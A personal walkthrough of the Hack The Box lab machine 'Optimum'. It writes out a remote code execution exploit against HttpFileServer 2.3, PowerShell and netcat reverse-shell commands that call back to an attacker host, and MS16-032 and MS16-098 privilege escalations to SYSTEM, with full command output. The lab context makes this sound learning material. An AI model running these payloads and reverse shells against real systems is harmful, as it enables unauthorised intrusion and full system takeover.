HTB: Optimum

Optimum

Optimum was after Nibbles; I went in blind and struggled a bit.

Ports

HTTP only. Well, that’s a start.

HTTP

On the webpage we see something called “HttpFileServer 2.3” is running; we can searchsploit this and find it’s trivially exploitable. There is a python exploit:

python3 /opt/htb/optimum/49125.py 10.10.10.8 80 "command goes here"

So I use this to get a Nishang (powershell) reverse shell like I did for Devel:

python3 /opt/htb/optimum/49125.py 10.10.10.8 80 "c:\windows\SysNative\WindowsPowershell\v1.0\powershell.exe IEX (New-Object Net.WebClient).DownloadString('http://10.10.14.7/Invoke-PowerShellTcp.ps1')"

And from there it’s user.txt. Now what?

Privesc

I run systeminfo, capture the output and run it against Windows Exploit Suggester NextGen and get information overload; it’s not clear what the best option is. I upload WinPEAS both as a batch file and as binaries but it doesn’t seem to want to run, at all.

After some beating about the bush, I google for the privesc vulnerability. It’s (intended to be) MS16-032, or a vulnerability in the Windows Secondary Logon Service. There are a variety of Powershell exploits, but I can’t get them to run.

After a while I relent, and run the whole thing through Metasploit. This uses msf6 exploit(windows/http/rejetto_hfs_exec) for the foothold. I run msf6 post(multi/recon/local_exploit_suggester) and it does point out:

[+] 10.10.10.8 - exploit/windows/local/ms16_032_secondary_logon_handle_privesc: The service is running, but could not be validated.

I run this, and the second time I try it works:

msf6 exploit(windows/local/ms16_032_secondary_logon_handle_privesc) > run

[*] Started reverse TCP handler on 10.10.14.7:4444 
[+] Compressed size: 1016
[!] Executing 32-bit payload on 64-bit ARCH, using SYSWOW64 powershell
[*] Writing payload file, C:\Users\kostas\AppData\Local\Temp\GafcUZnZTQ.ps1...
[*] Compressing script contents...
[+] Compressed size: 3592
[*] Executing exploit script...
         __ __ ___ ___   ___     ___ ___ ___ 
        |  V  |  _|_  | |  _|___|   |_  |_  |
        |     |_  |_| |_| . |___| | |_  |  _|
        |_|_|_|___|_____|___|   |___|___|___|
                                            
                       [by b33f -> @FuzzySec]

[?] Operating system core count: 2
[>] Duplicating CreateProcessWithLogonW handle
[?] Done, using thread handle: 1716

[*] Sniffing out privileged impersonation token..

[?] Thread belongs to: svchost
[+] Thread suspended
[>] Wiping current impersonation token
[>] Building SYSTEM impersonation token
[?] Success, open SYSTEM token handle: 2268
[+] Resuming thread..

[*] Sniffing out SYSTEM shell..

[>] Duplicating SYSTEM token
[>] Starting token race
[>] Starting process race
[!] Holy handle leak Batman, we have a SYSTEM shell!!

O6lWUcY8xVTopCWahdbDPygYaYQadWPe
[+] Executed on target machine.
[*] Sending stage (175174 bytes) to 10.10.10.8
[*] Meterpreter session 2 opened (10.10.14.7:4444 -> 10.10.10.8:49193) at 2021-03-10 04:20:32 -0500
[+] Deleted C:\Users\kostas\AppData\Local\Temp\GafcUZnZTQ.ps1

meterpreter > shell
Process 456 created.
Channel 1 created.
Microsoft Windows [Version 6.3.9600]
(c) 2013 Microsoft Corporation. All rights reserved.

C:\Users\kostas\Desktop>whoami 
whoami
nt authority\system

Without MSF

Not satisfied with this - particularly after trying and failing to do it via PS1 scripts - I look at another writeup. This one uses an entirely different privesc vulnerability (MS16-098), with a precompiled binary.

In order to run this I need nc on the box, so I copy it up from my powershell reverse shell, along with the exploit:

──(root💀kali)-[/opt/htb/optimum]
└─# nc -nvlp 443
listening on [any] 443 ...
connect to [10.10.14.7] from (UNKNOWN) [10.10.10.8] 49180
cd CWindows PowerShell running as user kostas on OPTIMUM
Copyright (C) 2015 Microsoft Corporation. All rights reserved.

:PS C:\Users\kostas\Desktop>\Temp
                   
PS C:\Temp> iwr http://10.10.14.7/41020.exe -Outfile 41020.exe
PS C:\Temp> iwr http://10.10.14.7/nc.exe -Outfile nc.exe
PS C:\Temp> dir
Directory: C:\Temp

Mode                LastWriteTime     Length Name 
----                -------------     ------ ----
-a---         16/3/2021   8:37 ??     560128 41020.exe
-a---         16/3/2021   8:40 ??      59392 nc.exe 

Next, I use the foothold exploit to trigger a netcat shell:

┌──(root💀kali)-[/opt/htb/optimum]
└─# python3 /opt/htb/optimum/49125.py 10.10.10.8 80 "C:\Temp\nc.exe -e cmd.exe 10.10.14.7 445"                                 
http://10.10.10.8:80/?search=%00{.+exec|C%3A%5CTemp%5Cnc.exe%20-e%20cmd.exe%2010.10.14.7%20445.}

And then I can fire the exploit:

┌──(root💀kali)-[/opt/htb/optimum]
└─# nc -nvlp 445       
listening on [any] 445 ...
connect to [10.10.14.7] from (UNKNOWN) [10.10.10.8] 49185
Microsoft Windows [Version 6.3.9600]
(c) 2013 Microsoft Corporation. All rights reserved.

C:\Users\kostas\Desktop>cd C:\Temp
cd C:\Temp

C:\Temp>dir
dir
 Volume in drive C has no label.
 Volume Serial Number is D0BC-0196

 Directory of C:\Temp

16/03/2021  08:40 ��    <DIR>          .
16/03/2021  08:40 ��    <DIR>          ..
16/03/2021  08:37 ��           560.128 41020.exe
16/03/2021  08:40 ��            59.392 nc.exe
               2 File(s)        619.520 bytes
               2 Dir(s)  31.858.794.496 bytes free

C:\Temp>41020.exe
41020.exe
Microsoft Windows [Version 6.3.9600]
(c) 2013 Microsoft Corporation. All rights reserved.

C:\Temp>whoami
whoami
nt authority\system

At the end of the day that’s pretty straightforward but there’s a lot for me to work on here.